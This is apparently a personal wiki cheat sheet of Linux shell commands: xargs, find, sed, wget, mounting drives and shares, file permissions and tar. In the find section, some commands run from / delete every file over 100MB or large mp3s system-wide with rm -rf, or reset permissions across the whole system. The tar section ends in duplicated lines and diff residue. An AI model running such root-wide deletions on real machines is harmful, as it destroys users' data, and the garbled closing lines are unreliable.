== Xargs ==

<pre>
Find all jpg files in a directory and copy them to another dir
find upload/ -type f -name "*.jpg" -print0 | xargs -I '{}' -0 cp '{}' alljpgs/

Read a file.txt and create a directory for each line of the file
file.txt contents = (each on a separate line) apple oranges pear
cat file.txt | sort | uniq | xargs -I {} mkdir -p /var/www/fruits/{}

find dir/ -type f -print0 | xargs -0 chmod 755
#-print0 makes find separate the file names with a null character, and -0 makes xargs split on that null character

find . -name "*fruit.txt" -print0 | xargs -0 -I {} cp {} /folder/{}.backup
#Find files in the current directory tree with fruit in the filename. "{}" is the placeholder for the filename; each match is copied to the specified folder

find . -maxdepth 1 -name "*fruit.txt" -print0 | xargs -0 rm
#Same search limited to the current directory only, deleting the matches

find . -name "*invoice*" -print0 | xargs -0 grep -li 'outwater' | xargs -I {} cp {} /dir/{}
#Find all files with the word invoice in the name, send them to grep to search the contents for the text outwater, then copy those files to the dir
</pre>
===Copy all images to external hard-drive===
# ls *.jpg | xargs -n1 -i cp {} /external-hard-drive/directory
 
Search all jpg images in the system and archive them.
 
# find / -name "*.jpg" -type f -print | xargs tar -cvzf images.tar.gz
 
Download all the URLs mentioned in the url-list.txt file
 
# cat url-list.txt | xargs wget -c
 
== Tree Command ==
apt install tree
tree -a
# list dir tree including hidden files
 
tree -f
#To list the directory contents with the full path prefix for each sub-directory and file, use the -f as shown
 
tree -d
or
tree -df
#You can also instruct tree to only print the subdirectories minus the files in them using the -d option. If used together with the -f option, the tree will print the full directory path as shown
 
tree -f -L 2
# You can specify the maximum display depth of the directory tree using the -L option. For example, if you want a depth of 2, run the following command.
 
 
tree -f -P "cata*"
# To display only those files that match the wild-card pattern, use the -P flag and specify your pattern. In this example, the command will only list files that match cata*, so files such as Catalina.sh, catalina.bat, etc. will be listed.
 
tree -f --du
#Another useful option is --du, which reports the size of each sub-directory as the accumulation of sizes of all its files and subdirectories (and their files, and so on).
 
tree -o filename.txt
#redirect the tree's output to filename for later analysis using the -o option
 
== Diff Command ==
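A minimal sketch of common diff usage (the file and directory names are placeholders):
<pre>
diff file1.txt file2.txt       # show the lines that differ between two files
diff -u file1.txt file2.txt    # unified format, the style expected by patch
diff -r dir1/ dir2/            # recursively compare two directory trees
</pre>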
== Wget Command ==

<pre>
Download a single file

$ wget http://prdownloads.sourceforge.net/sourceforge/nagios/nagios-3.2.1.tar.gz

Download and store it with a different name.

$ wget -O taglist.zip http://www.vim.org/scripts/download_script.php?src_id=7701

Download in the Background Using wget -b
For a huge download, put the download in the background using the wget option -b as shown below.

$ wget -b http://www.openss7.org/repos/tarballs/strx25-0.9.2.1.tar.bz2

Mask User Agent and Display wget like Browser Using wget --user-agent

Download Multiple Files Using wget -i
First, store all the download files or URLs in a text file as:

$ cat > download-file-list.txt

URL1

Next, give the download-file-list.txt as argument to wget using the -i option as shown below.

$ wget -i download-file-list.txt

Download a Full Website Using wget --mirror
Following is the command line which you want to execute when you want to download a full website and make it available for local viewing.

$ wget --mirror -p --convert-links -P ./LOCAL-DIR WEBSITE-URL

--mirror : turn on options suitable for mirroring.

If you have found a website which is useful but don't want to download the images, you can specify the following.

$ wget --reject=gif WEBSITE-TO-BE-DOWNLOADED

Download Only Certain File Types Using wget -r -A
Download all PDF files from a website

$ wget -r -A.pdf http://url-to-webpage-with-pdfs/

FTP Download With wget
Anonymous FTP download using Wget

$ wget ftp-url

FTP download using wget with username and password authentication.

$ wget --ftp-user=USERNAME --ftp-password=PASSWORD DOWNLOAD-URL

</pre>
== Move Multiple folders to another directory ==

<pre>
mv -v /home/user1/Desktop/folder1/* /var/tmp/

This will move the contents of folder1 to the tmp folder
</pre>
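mv also accepts several source folders before the destination, so multiple directories can be moved in one command; a minimal sketch (the folder names are placeholders):
<pre>
mv -v /home/user1/Desktop/folder1 /home/user1/Desktop/folder2 /var/tmp/
</pre>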
 
== Using Grep and find to search through eml files ==
<pre>
Using Grep and Find to search through .eml files for a specific phrase

go to the dir in question

find . -exec grep -ils 'text to find' /dev/null {} \; | xargs -I {} cp -p {} /Users/homedir/Desktop/

above will find the files and copy them to the specified folder

find . -exec grep -ils 'text to find\|more text to find\|even more text' /dev/null {} \; | xargs -I {} cp -p {} /Users/homedir/Desktop/

Above will find multiple search strings

find . -type f -name ".DS_Store" -exec rm -f {} \;

Above will find .DS_Store files in the current dir and subdirs and delete them

find . -exec grep -ls 'text to find' /dev/null {} \;
find . -exec grep -H 'text to look for' {} \;
find . -exec grep -n 'text to look for' /dev/null {} \;
find . -exec grep -n 'yuly' /dev/null {} \; -print >> /Volumes/RAIDset1/1share/text.txt

list files that contain the name "out"

ls -la | grep out

Find files in a dir with a string. The -i is case insensitive, -w matches the exact word

find dirname | grep -i string
</pre>
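A minimal sketch of the -w exact-word match mentioned above (the directory and search term are placeholders):
<pre>
find dirname | grep -iw report    # matches the word "report" but not "reporting"
</pre>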
 
== SED find and replace ==
<pre>
sed -i (in place) s (substitute) /find/replace/ g (global). You can replace the / with any other delimiter, e.g. | or :. For example, if you want to find the text "/mac" you would use : as the delimiter: sed -i 's:/mac:mac:g'

Find and Replace Multiple (add the -e switch)
sed -e 's/find/replace/g' -e 's/find/replace/g'

Let us start off simple:
Imagine you have a large file ( txt, php, html, anything ) and you want to replace all the words "ugly" with "beautiful"

This is the command:

sed -i 's/ugly/beautiful/g' /home/bruno/old-friends/sue.txt

"sed" edits "-i" in place ( on the spot ) and replaces the word "ugly" with "beautiful" in the file "/home/bruno/old-friends/sue.txt"

Imagine you have a whole lot of files in a directory and you want the same command to do all those files in one go
Remember the find command ? We will combine the two:

$ find /home/bruno/old-friends -type f -exec sed -i 's/ugly/beautiful/g' {} \;

Sure, in combination with the find command you can do all kinds of nice tricks, even if you don't remember where the files are located !

Additionally I did find a little script on the net for if you often have to find and replace in multiple files at once:

#!/bin/bash
for fl in *.php; do
    mv $fl $fl.old
    sed 's/FINDSTRING/REPLACESTRING/g' $fl.old > $fl
    rm -f $fl.old
done

just replace the "*.php", "FINDSTRING" and "REPLACESTRING", make it executable and you are set.

For the lovers of perl I also found this one:

# perl -e "s/old_string/new_string/g;" -pi.save $(find DirectoryName -type f)
</pre>
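A minimal sketch of the alternate-delimiter form described above, assuming a hypothetical file paths.txt that contains the text "/mac":
<pre>
sed -i 's:/mac:mac:g' paths.txt    # using ":" as the delimiter avoids escaping the "/" in the search text
</pre>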


== Creating ISO File from a folder ==

<pre>
If you want to make an iso file from a directory containing other files and sub-directories via the terminal, you can use the following command:

mkisofs -o image.iso -R /path/to/folder/

If you wish to backup the home folder, use this command:

mkisofs -o image.iso -R $HOME
</pre>

== Mount Windows SMB share on linux ==
* apt install cifs-utils
* mkdir /mnt/share
* mount.cifs "//192.168.1.1/windows share" /mnt/share -o user=bob
** use quotes when there are spaces in the share name
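To avoid putting the password on the command line, mount.cifs can also read it from a credentials file; a minimal sketch (the file path and account details are placeholders):
<pre>
# /root/.smbcred contains two lines:
#   username=bob
#   password=secret
chmod 600 /root/.smbcred
mount.cifs "//192.168.1.1/windows share" /mnt/share -o credentials=/root/.smbcred
</pre>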
== Mount ftp server as local drive ==
<pre>
1. Installation

First install the curlftpfs package. On Debian or Ubuntu it is as simple as:

apt-get install curlftpfs

2. Mount ftp directory
What needs to be done next is to create a mount point:

# mkdir /mnt/my_ftp

next use curlftpfs to mount your remote ftp site. Suppose my access credentials are as follows:

username: ftp-user
password: ftp-pass
host/IP: my-ftp-location.local
the actual curlftpfs mount command would be:

# curlftpfs ftp-user:ftp-pass@my-ftp-location.local /mnt/my_ftp/

Caution:

On Debian you can mount ftp using curlftpfs as root, and this allows only the root user to access the ftp mount. No other users are allowed, since by default only the user that mounts has access to the mount directory. When mounting ftp as a non-root user you may get the following error message:

fuse: failed to open /dev/fuse: Permission denied

Rather than changing permissions of /dev/fuse you can allow other users to access the ftp mount directory with curlftpfs's option allow_other. The command will look similar to the one below:

# curlftpfs -o allow_other ftp-user:ftp-pass@my-ftp-location.local /mnt/my_ftp/

3. Mount ftp with curlftpfs using /etc/fstab

Since we do not want to put any passwords into the /etc/fstab file, we will first create a /root/.netrc file with the ftp username and password using this format:

machine my-ftp-location.local
login ftp-user
password ftp-pass

Now change permissions of this file to 600:

# chmod 600 /root/.netrc

Check the uid and gid of your non-root user. This user will have access to the ftp mount directory:

$ id

In the next step add the following line to your /etc/fstab file ( change credentials for your ftp user ):

curlftpfs#my-ftp-location.local /mnt/my_ftp fuse allow_other,uid=1000,gid=1000,umask=0022 0 0

Now mount ftp with:

mount -a

</pre>
== Creating Aliases ==
<pre>
For Mac the .bashrc file is in the Home dir ~ and it's called .bash_profile
</pre>
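A minimal sketch of defining an alias in ~/.bashrc (the alias name and command are only examples):
<pre>
# add the line to ~/.bashrc (or ~/.bash_profile on a Mac)
alias ll='ls -la'

# re-read the file so the alias works in the current shell
source ~/.bashrc
</pre>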
== Find Command ==
<pre>
Part I – Basic Find Commands for Finding Files with Names
1. Find Files Using Name in Current Directory
Find all the files whose name is tecmint.txt in a current working directory.
# find . -name tecmint.txt
./tecmint.txt
2. Find Files Under Home Directory
Find all the files under /home directory with name tecmint.txt.
# find /home -name tecmint.txt
/home/tecmint.txt
3. Find Files Using Name and Ignoring Case
Find all the files whose name is tecmint.txt and contains both capital and small letters in the /home directory.
# find /home -iname tecmint.txt
./tecmint.txt
./Tecmint.txt
4. Find Directories Using Name
Find all directories whose name is Tecmint in / directory.
# find / -type d -name Tecmint
/Tecmint
5. Find PHP Files Using Name
Find all php files whose name is tecmint.php in a current working directory.
# find . -type f -name tecmint.php
./tecmint.php
6. Find all PHP Files in Directory
Find all php files in a directory.
# find . -type f -name "*.php"
./tecmint.php
./login.php
./index.php
Part II – Find Files Based on their Permissions
7. Find Files With 777 Permissions
Find all the files whose permissions are 777.
# find . -type f -perm 0777 -print
8. Find Files Without 777 Permissions
Find all the files without permission 777.
# find / -type f ! -perm 777
9. Find SGID Files with 644 Permissions
Find all the SGID bit files whose permissions are set to 644.
# find / -perm 2644
10. Find Sticky Bit Files with 551 Permissions
Find all the Sticky Bit set files whose permissions are 551.
# find / -perm 1551
11. Find SUID Files
Find all SUID set files.
# find / -perm /u=s
12. Find SGID Files
Find all SGID set files.
# find / -perm /g+s
13. Find Read Only Files
Find all Read Only files.
# find / -perm /u=r
14. Find Executable Files
Find all Executable files.
# find / -perm /a=x
15. Find Files with 777 Permissions and Chmod to 644
Find all 777 permission files and use chmod command to set permissions to 644.
# find / -type f -perm 0777 -print -exec chmod 644 {} \;
16. Find Directories with 777 Permissions and Chmod to 755
Find all 777 permission directories and use chmod command to set permissions to 755.
# find / -type d -perm 777 -print -exec chmod 755 {} \;
17. Find and remove single File
To find a single file called tecmint.txt and remove it.
# find . -type f -name "tecmint.txt" -exec rm -f {} \;
18. Find and remove Multiple File
To find and remove multiple files such as .mp3 or .txt, then use.
# find . -type f -name "*.txt" -exec rm -f {} \;
OR
# find . -type f -name "*.mp3" -exec rm -f {} \;
19. Find all Empty Files
To find all empty files under a certain path.
# find /tmp -type f -empty
20. Find all Empty Directories
To find all empty directories under a certain path.
# find /tmp -type d -empty
21. Find all Hidden Files
To find all hidden files, use the command below.
# find /tmp -type f -name ".*"
Part III – Search Files Based On Owners and Groups
22. Find Single File Based on User
To find all or single file called tecmint.txt under /root directory of owner root.
# find / -user root -name tecmint.txt
23. Find all Files Based on User
To find all files that belongs to user Tecmint under /home directory.
# find /home -user tecmint
24. Find all Files Based on Group
To find all files that belongs to group Developer under /home directory.
# find /home -group developer
25. Find Particular Files of User
To find all .txt files of user Tecmint under /home directory.
# find /home -user tecmint -iname "*.txt"
Part IV – Find Files and Directories Based on Date and Time
26. Find Last 50 Days Modified Files
To find all the files which are modified 50 days back.
# find / -mtime 50
27. Find Last 50 Days Accessed Files
To find all the files which are accessed 50 days back.
# find / -atime 50
28. Find Last 50-100 Days Modified Files
To find all the files which are modified more than 50 days back and less than 100 days.
# find / -mtime +50 -mtime -100
29. Find Changed Files in Last 1 Hour
To find all the files which are changed in last 1 hour.
# find / -cmin -60
30. Find Modified Files in Last 1 Hour
To find all the files which are modified in last 1 hour.
# find / -mmin -60
31. Find Accessed Files in Last 1 Hour
To find all the files which are accessed in last 1 hour.
# find / -amin -60
Part V – Find Files and Directories Based on Size
32. Find 50MB Files
To find all 50MB files, use.
# find / -size 50M
33. Find Size between 50MB – 100MB
To find all the files which are greater than 50MB and less than 100MB.
# find / -size +50M -size -100M
34. Find and Delete 100MB Files
To find all 100MB files and delete them using one single command.
# find / -size +100M -exec rm -rf {} \;
35. Find Specific Files and Delete
Find all .mp3 files of more than 10MB and delete them using one single command.
# find / -type f -name "*.mp3" -size +10M -exec rm -f {} \;
</pre>
== Set File And Directory Permissions using Find Command ==
<pre>
This will set all the directories to 755 and all the files to 644
find . -type d -print0 | xargs -0 chmod 755
find . -type f -print0 | xargs -0 chmod 644
</pre>
== Permissions on Linux ==
<pre>
File permission symbols
If you run the command
ls -l
in your home directory, you will get a list of files that may include something like this
-rw-r--r--  1  bob  users  1892  Jul 10  18:30 linux_course_notes.txt
This basically says, interpreting this from RIGHT to LEFT that the file, linux_course_notes.txt was created at 6:30 PM on July 10 and is 1892 bytes large. It belongs to the group users (i.e, the people who use this computer). It belongs to bob in particular and it is one (1) file. Then come the file permission symbols.
Let's look at what these symbols mean:
The dashes - separate the permissions into three types
The first part refers to the owner's (bob's) permissions.
The dash - before the rw means that this is a normal file that contains any type of data. A directory, for example, would have a d instead of a dash.
The rw that follows means that bob can read and write to (modify) his own file. That's pretty logical. If you own it, you can do what you want with it.
The second part of these symbols, after the second dash, is the permissions for the group. Linux can establish different types of groups for file access. In a one-home-computer environment anyone who uses the computer can read this file but cannot write to (modify) it. This is a completely normal situation. You, as a user, may want to take away the rights of others to read your file. We'll cover how to do that later.
After the two dashes (two here because there is no write permission for the group) come the overall user permissions. Anyone who might have access to the computer from inside or outside (in the case of a network) can read this file. Once again, we can take away the possibility of people reading this file if we so choose.
Let's take a look at some other examples. An interesting place to look at different kinds of file permissions is the /bin directory. Here we have the commands that anybody can use on the Linux system. Let's look at the command for gzip, a file compression utility for Linux.
-rwxr-xr-x  1 root    root        53468 May  1  1999 gzip
As we see here, there are some differences.
The program name, date, bytes are all standard. Even though this is obviously different information, the idea is the same as before.
The changes are in the owner and group. Root owns the file and it is in the group "root". Root is actually the only member of that group.
The file is an executable (program) so that's why the letter x is among the symbols.
This file can be executed by everybody: the owner (root), the group (root) and all others that have access to the computer
As we mentioned, the file is a program, so there is no need for anybody other than root to "write" to the file, so there is no w permissions for it for anybody but root.
If we look at a file in /sbin which are files that only root can use or execute, the permissions would look like this:
-rwxr--r--  1 root    root        1065 Jan 14  1999 cron
'cron' is a program on Linux systems that allows programs to be run automatically at certain times and under certain conditions. As we can see here, only root, the owner of the file, is allowed to use this program. There are no x permissions for the rest of the users.
We hope you enjoyed this little walk-through of file permissions in Linux. Now that we know what we're looking for, we can talk about changing certain permissions.
chmod
chmod is a Linux command that will let you "set permissions" (aka, assign who can read/write/execute) on a file.
chmod permissions file
chmod permission1_permission2_permission3 file
When using chmod, you need to be aware that there are three types of Linux users that you are setting permissions for. Therefore, when setting permissions, you are assigning them for "yourself", "your group" and "everyone else" in the world. These users are technically known as:
Owner
Group
World
Therefore, when setting permissions on a file, you will want to assign all three levels of permissions, and not just one user.
Think of the chmod command actually having the following syntax...
chmod owner group world FileName
Now that you understand that you are setting permissions for THREE user levels, you just have to wrap your head around what permissions you are able to set!
There are three types of permissions that Linux allows for each file.
read
write
execute
Putting it all together:
So, in laymen terms, if you wanted a file to be readable by everyone, and writable by only you, you would write the chmod command with the following structure.
COMMAND : OWNER : GROUP : WORLD : PATH
chmod read & write read read FileName
chmod 6 4 4 myDoc.txt
Wait! What are those numbers?!?
Computers like numbers, not words. Sorry. You will have to deal with it. Take a look at the following output of `ls -l`
-rw-r--r-- 1 gcawood iqnection 382 Dec 19 6:49 myDoc.txt
You will need to convert the word read or write or execute into the numeric equivalent (octal) based on the table below.
4 – read (r)
2 – write (w)
1 – execute (x)
Practical Examples
chmod 400 mydoc.txt – read by owner
chmod 040 mydoc.txt – read by group
chmod 004 mydoc.txt – read by anybody (other)
chmod 200 mydoc.txt – write by owner
chmod 020 mydoc.txt – write by group
chmod 002 mydoc.txt – write by anybody
chmod 100 mydoc.txt – execute by owner
chmod 010 mydoc.txt – execute by group
chmod 001 mydoc.txt – execute by anybody
Wait! I don't get it... there aren't enough permissions to do what I want!
Good call. You need to add up the numbers to get other types of permissions...
So, try wrapping your head around this!!
7 = 4+2+1 (read/write/execute)
6 = 4+2 (read/write)
5 = 4+1 (read/execute)
4 = 4 (read)
3 = 2+1 (write/execute)
2 = 2 (write)
1 = 1 (execute)
chmod 666 mydoc.txt – read/write by anybody! (the devil loves this one!)
chmod 755 mydoc.txt – rwx for owner, rx for group and rx for the world
chmod 777 mydoc.txt – read, write, execute for all! (may not be the best plan in the world...)
</pre>
== Format a drive in bash ==
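A minimal sketch of formatting a partition as ext4 (the device name /dev/sdb1 is a placeholder; double-check it with lsblk first, since mkfs erases everything on the partition):
<pre>
lsblk                                  # identify the target partition
sudo umount /dev/sdb1                  # make sure it is not mounted
sudo mkfs.ext4 -L mydata /dev/sdb1     # create an ext4 filesystem labelled "mydata"
</pre>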


== File Permissions on Unix ==
<pre>
Understanding file permissions on Unix: a brief tutorial
(For files on AFS fileservers, see below)
Every user on a Unix system has a unique username, and is a member of at least one group (the primary group for that user). This group information is held in the password file (/etc/passwd). A user can also be a member of one or more other groups. The auxiliary group information is held in the file /etc/group. Only the administrator can create new groups or add/delete group members (one of the shortcomings of the system).
Every directory and file on the system has an owner, and also an associated group. It also has a set of permission flags which specify separate read, write and execute permissions for the 'user' (owner), 'group', and 'other' (everyone else with an account on the computer). The 'ls' command shows the permissions and group associated with files when used with the -l option. On some systems (e.g. Coos), the '-g' option is also needed to see the group information.
An example of the output produced by 'ls -l' is shown below.
drwx------ 2 richard staff  2048 Jan  2 1997  private
drwxrws--- 2 richard staff  2048 Jan  2 1997  admin
-rw-rw---- 2 richard staff 12040 Aug 20 1996  admin/userinfo
drwxr-xr-x 3 richard user  2048 May 13 09:27 public
Understanding how to read this output is useful to all unix users, but especially people using group access permissions.
Field 1:  a set of ten permission flags.
Field 2:  link count (don't worry about this)
Field 3:  owner of the file
Field 4:  associated group for the file
Field 5:  size in bytes
Field 6-8: date of last modification (format varies, but always 3 fields)
Field 9:  name of file (possibly with path, depending on how ls was called)
The permission flags are read as follows (left to right)
position Meaning
1 directory flag, 'd' if a directory, '-' if a normal file, something else occasionally may appear here for special devices.
2,3,4 read, write, execute permission for User (Owner) of file
5,6,7 read, write, execute permission for Group
8,9,10 read, write, execute permission for Other
value Meaning
- in any position means that flag is not set
r file is readable by owner, group or other
w file is writeable. On a directory, write access means you can add or delete files
x file is executable (only for programs and shell scripts - not useful for data files). Execute permission on a directory means you can list the files in that directory
s in the place where 'x' would normally go is called the set-UID or set-groupID flag.
On an executable program with set-UID or set-groupID, that program runs with the effective permissions of its owner or group.
For a directory, the set-groupID flag means that all files created inside that directory will inherit the group of the directory. Without this flag, a file takes on the primary group of the user creating the file. This property is important to people trying to maintain a directory as group accessible. The subdirectories also inherit the set-groupID property.
The default file permissions (umask):
Each user has a default set of permissions which apply to all files created by that user, unless the software explicitly sets something else. This is often called the 'umask', after the command used to change it. It is either inherited from the login process, or set in the .cshrc or .login file which configures an individual account, or it can be run manually.
Typically the default configuration is equivalent to typing 'umask 22' which produces permissions of:
-rw-r--r-- for regular files, or
drwxr-xr-x for directories.
In other words, user has full access, everyone else (group and other) has read access to files, lookup access to directories.
When working with group-access files and directories, it is common to use 'umask 2' which produces permissions of:
-rw-rw-r-- for regular files, or
drwxrwxr-x for directories.
For private work, use 'umask 77' which produces permissions:
-rw------- for regular files, or
drwx------ for directories.
The logic behind the number given to umask is not intuitive.
The command to change the permission flags is "chmod". Only the owner of a file can change its permissions.
The command to change the group of a file is "chgrp". Only the owner of a file can change its group, and can only change it to a group of which he is a member.
See the online manual pages for details of these commands on any particular system (e.g. "man chmod").
Examples of typical usage are given below:
chmod g+w myfile
give group write permission to "myfile", leaving all other permission flags alone
chmod g-rw myfile
remove read and write access to "myfile", leaving all other permission flags alone
chmod g+rwxs mydir
give full group read/write access to directory "mydir", also setting the set-groupID flag so that directories created inside it inherit the group
chmod u=rw,go= privatefile
explicitly give user read/write access, and revoke all group and other access, to file 'privatefile'
chmod -R g+rw .
give group read write access to this directory, and everything inside of it (-R = recursive)
chgrp -R medi .
change the ownership of this directory to group 'medi' and everything inside of it (-R = recursive). The person issuing this command must own all the files or it will fail.
WARNINGS:
Putting 'umask 2' into a startup file (.login or .cshrc) will make these settings apply to everything you do unless manually changed. This can lead to giving group access to files such as saved email in your home directory, which is generally not desirable.
Making a file group read/write without checking what its group is can lead to accidentally giving access to almost everyone on the system. Normally all users are members of some default group such as "users", as well as being members of specific project-oriented groups. Don't give group access to "users" when you intended some other group.
Remember that to read a file, you need execute access to the directory it is in AND read access to the file itself. To write a file, you need execute access to the directory AND write access to the file. To create new files or delete files, you need write access to the directory. You also need execute access to all parent directories back to the root. Group access will break if a parent directory is made completely private.
AFS Access Control Lists (ACLs)
Files on the central AFS fileservers all have the traditional Unix permissions as explained above, but they are also controlled by Access Control Lists(ACL) which take precedence. They provide access levels more flexible than the user/group/other attribute bits, but they work on the level of complete directories, not files. The command to set and list ACLs is fs.
"fs" is a big ugly command that does lots of things related to AFS filesystems depending on the arguments you call it with.
For details see the man pages for: fs_setacl, fs_listacl, fs_cleanacl, fs_copyacl
For brief help, do (e.g.) "fs help setacl"
The default is to give the same permissions to a new directory as are on the parent directory. In practice, this is usually to give complete rights to the owner of the directory, and lookup rights to any other user (equivalent to execute attribute on a directory).
To render a directory private, the simplest command is:
fs setacl -d DIRNAME -clear -a MYNAME all
- replace DIRNAME with the appropriate directory name (or "." for the current directory), and MYNAME with your login name.
Check it with:
fs listacl DIRNAME
It should reply with:
Access list for DIRNAME is
Normal rights:
  USERNAME rlidwka
(see man fs_setacl for a description of the meaning of the flags "rlidwka")
To explicitly give public read/lookup access, use:
fs setacl -d DIRNAME -a system:anyuser read
This can be abbreviated to
fs sa DIRNAME system:anyuser read
If "fs" is not found, or the man pages are not found, your paths are not set up correctly. I recommend you run /usr/local/bin/mknewdotfiles to correct that.
</pre>
== Wput - uploading file from terminal ==
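A minimal sketch of uploading a file with wput (the file name, credentials and host are placeholders):
<pre>
wput backup.tar.gz ftp://ftp-user:ftp-pass@ftp.example.com/backups/
</pre>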
== List and Mount a Drive ==
<pre>
Using mount
Get the Information
Sometimes devices don't automount, in which case you should try to manually mount them. First, you must know what device we are dealing with and what filesystem it is formatted with. Most flash drives are FAT16 or FAT32 and most external hard disks are NTFS.

sudo fdisk -l

Find your device in the list, it is probably something like /dev/sdb1. For more information about filesystems, see LinuxFilesystemsExplained.

Create the Mount Point
Now we need to create a mount point for the device, let's say we want to call it "external". You can call it whatever you want, just please don't use spaces in the name or it gets a little more complicated - use an underscore to separate words (like "my_external"). Create the mount point:

sudo mkdir /media/external

Mount the Drive
We can now mount the drive. Let's say the device is /dev/sdb1, the filesystem is FAT16 or FAT32 (like it is for most USB flash drives), and we want to mount it at /media/external (having already created the mount point):

sudo mount -t vfat /dev/sdb1 /media/external -o uid=1000,gid=100,utf8,dmask=027,fmask=137

The options following the "-o" allow your user to have ownership of the drive, and the masks allow for extra security for file system permissions. If you don't use those extra options you may not be able to read and write the drive with your regular username.

Otherwise if the device is formatted with NTFS, run:

sudo mount -t ntfs-3g /dev/sdb1 /media/external

Unmounting the Drive
When you are finished with the device, don't forget to unmount the drive before disconnecting it. Assuming /dev/sdb1 mounted at /media/external, you can either unmount using the device or the mount point:

sudo umount /dev/sdb1
or:
sudo umount /media/external
</pre>
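To make the mount permanent across reboots, the same options can go into /etc/fstab; a sketch reusing the /dev/sdb1 vfat example above:
<pre>
# add to /etc/fstab, then test with: sudo mount -a
/dev/sdb1  /media/external  vfat  uid=1000,gid=100,utf8,dmask=027,fmask=137  0  0
</pre>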
 
== 7 Useful Linux Networking Commands ==
<pre>
ifconfig for basic interface and IP configuration

View current configuration of network interfaces, including the interface names:

ifconfig

Turn an adapter on (up) or off (down):

ifconfig <network name> <up|down>

Assign an IP address to an adapter:

ifconfig <network name> <ip address>

Assign a second IP address to an adapter:

ifconfig <network name:instance number> <ip address>

Example: ifconfig eth0:0 192.168.1.101

ethtool for checking and changing adapter settings

Display the driver information for a specific network adapter, great when checking for software compatibility:

ethtool -i <interface name>

Initiate an adapter-specific action, usually blinking the LED lights on the adapter, to help you identify between multiple adapters or interface names:

ethtool -p <interface name>

Display network statistics:

ethtool -S <interface name>

Set the connection speed of the adapter in Mbps:

ethtool -s <interface name> speed <10|100|1000>

iwconfig for wireless configuration

Display the wireless settings of your interfaces, including the interface names you'll need for other commands:

iwconfig

Set the ESSID (Extended Service Set Identifier) or network name:

iwconfig <interface name> essid <network name>

Example: iwconfig <interface name> essid "my network"

Set the wireless channel of the radio (1-11):

iwconfig <interface name> channel <channel>

Input a WEP encryption key (WPA/WPA2 isn't supported yet; for this you need wpa_supplicant):

iwconfig eth0 key <key in HEX format>

Only allow the adapter to connect to an AP with the MAC address you specify:

iwconfig <interface name> ap <mac address>

Example: iwconfig eth0 ap 00:60:1D:01:23:45

Set the transmit power of the radio, if supported by the wireless card, in dBm format by default or mW when specified:

iwconfig <interface name> txpower <power level>

Example: iwconfig eth0 txpower 15

Example: iwconfig eth0 txpower 30mW
</pre>
 
== Accessing a Directory With a Space in The Filename ==
<pre>
Eg. Directory name is: "Dir 001"

To cd into that dir you would enter the command with a "\" to escape the space:

cd Dir\ 001
</pre>
 
== Manually Mount A Device in Ubuntu ==
<pre>
To manually mount a media device in the virtual directory, you'll need to be logged in as the root user. The basic command for manually mounting a media device is:

mount -t type device directory

The type parameter defines the filesystem type the disk was formatted under. There are lots and lots of different filesystem types that Linux recognizes. If you share removable media devices with your Windows PCs, the types you're most likely to run into are:

vfat: Windows long filesystem.
ntfs: Windows advanced filesystem used in Windows NT, XP, and Vista.
iso9660: The standard CD-ROM filesystem.

Most USB memory sticks and floppies are formatted using the vfat filesystem. If you need to mount a data CD, you'll have to use the iso9660 filesystem type.
The next two parameters define the location of the device file for the media device and the location in the virtual directory for the mount point. For example, to manually mount the USB memory stick at device /dev/sdb1 at location /media/disk, you'd use the command:

mount -t vfat /dev/sdb1 /media/disk

Once a media device is mounted in the virtual directory, the root user will have full access to the device, but access by other users will be restricted. You can control who has access to the device using directory permissions.

-a       Mount all filesystems specified in the /etc/fstab file.
-f       Causes the mount command to simulate mounting a device, but not actually mount it.
-F       When used with the -a parameter, mounts all filesystems at the same time.
-v       Verbose mode, explains all the steps required to mount the device.
-i       Don't use any filesystem helper files under /sbin/mount.filesystem.
-l       Add the filesystem labels automatically for ext2, ext3, or XFS filesystems.
-n       Mount the device without registering it in the /etc/mtab mounted device file.
-p num   For encrypted mounting, read the passphrase from the file descriptor num.
-s       Ignore mount options not supported by the filesystem.
-r       Mount the device as read-only.
-w       Mount the device as read-write (the default).
-L label Mount the device with the specified label.
-U uuid  Mount the device with the specified uuid.
-O       When used with the -a parameter, limits the set of filesystems applied.
-o       Add specific options to the filesystem.

The -o option allows you to mount the filesystem with a comma-separated list of additional options. The popular options to use are:

user: Allow an ordinary user to mount the filesystem.
check=none: Mount the filesystem without performing an integrity check.

A popular thing in Linux these days is to distribute a CD as a .iso file. The .iso file is a complete image of the CD in a single file. Most CD-burning software packages can create a new CD based on the .iso file. A feature of the mount command is that you can mount a .iso file directly to your Linux virtual directory without having to burn it onto a CD. This is accomplished using the -o parameter with the loop option:

$ mkdir mnt
$ su
Password:
# mount -t iso9660 -o loop MEPIS-KDE4-LIVE-DVD_32.iso mnt
</pre>
== Linux Directory Structure ==
{| class="wikitable"
|/
|The root of the virtual directory. Normally, no files are placed here.
|-
|/bin
|The binary directory, where many GNU user-level utilities are stored.
|-
|/boot
|The boot directory, where boot files are stored.
|-
|/dev
|The device directory, where Linux creates device nodes.
|-
|/etc
|The system configuration files directory.
|-
|/home
|The home directory, where Linux creates user directories.
|-
|/lib
|The library directory, where system and application library files are stored.
|-
|/media
|The media directory, a common place for mount points used for removable media.
|-
|/mnt
|The mount directory, another common place for mount points used for removable media.
|-
|/opt
|The optional directory, often used to store optional software packages.
|-
|/root
|The root home directory.
|-
|/sbin
|The system binary directory, where many GNU admin-level utilities are stored.
|-
|/tmp
|The temporary directory, where temporary work files can be created and destroyed.
|-
|/usr
|The user-installed software directory.
|-
|/var
|The variable directory, for files that change frequently, such as log files.
|}
== How to Use TAR zip ==  
<pre>
To unzip .bz2 files use:

tar -jxvf filename.tar.bz2

To unzip .gz files use:

tar -zxvf filename.tar.gz

zip and unzip

To create a zip file containing dir1, dir2, ... :
zip -r <filename>.zip dir1 dir2 ...
To extract <filename>.zip:
unzip <filename>.zip

To combine multiple files and/or directories into a single file, use the following command:
To combine multiple files and/or directories into a single file, use the following command:


tar -cvf file.tar inputfile1 inputfile2
tar -cvf file.tar inputfile1 inputfile2


Replace inputfile1 and inputfile2 with the files and/or directories you want to combine. You can use any name in place of file.tar, though you should keep the .tar extension. If you don't use the  f  option, tar assumes you really do want to create a tape archive instead of joining up a number of files. The  v  option tells tar to be verbose, which reports all files as they are added.
Replace inputfile1 and inputfile2 with the files and/or directories you want to combine. You can use any name in place of file.tar, though you should keep the .tar extension. If you don't use the  f  option, tar assumes you really do want to create a tape archive instead of joining up a number of files. The  v  option tells tar to be verbose, which reports all files as they are added.
Line 1,190: Line 687:
To separate an archive created by tar into separate files, at the shell prompt, enter:
To separate an archive created by tar into separate files, at the shell prompt, enter:


tar -xvf file.tar
tar -xvf file.tar


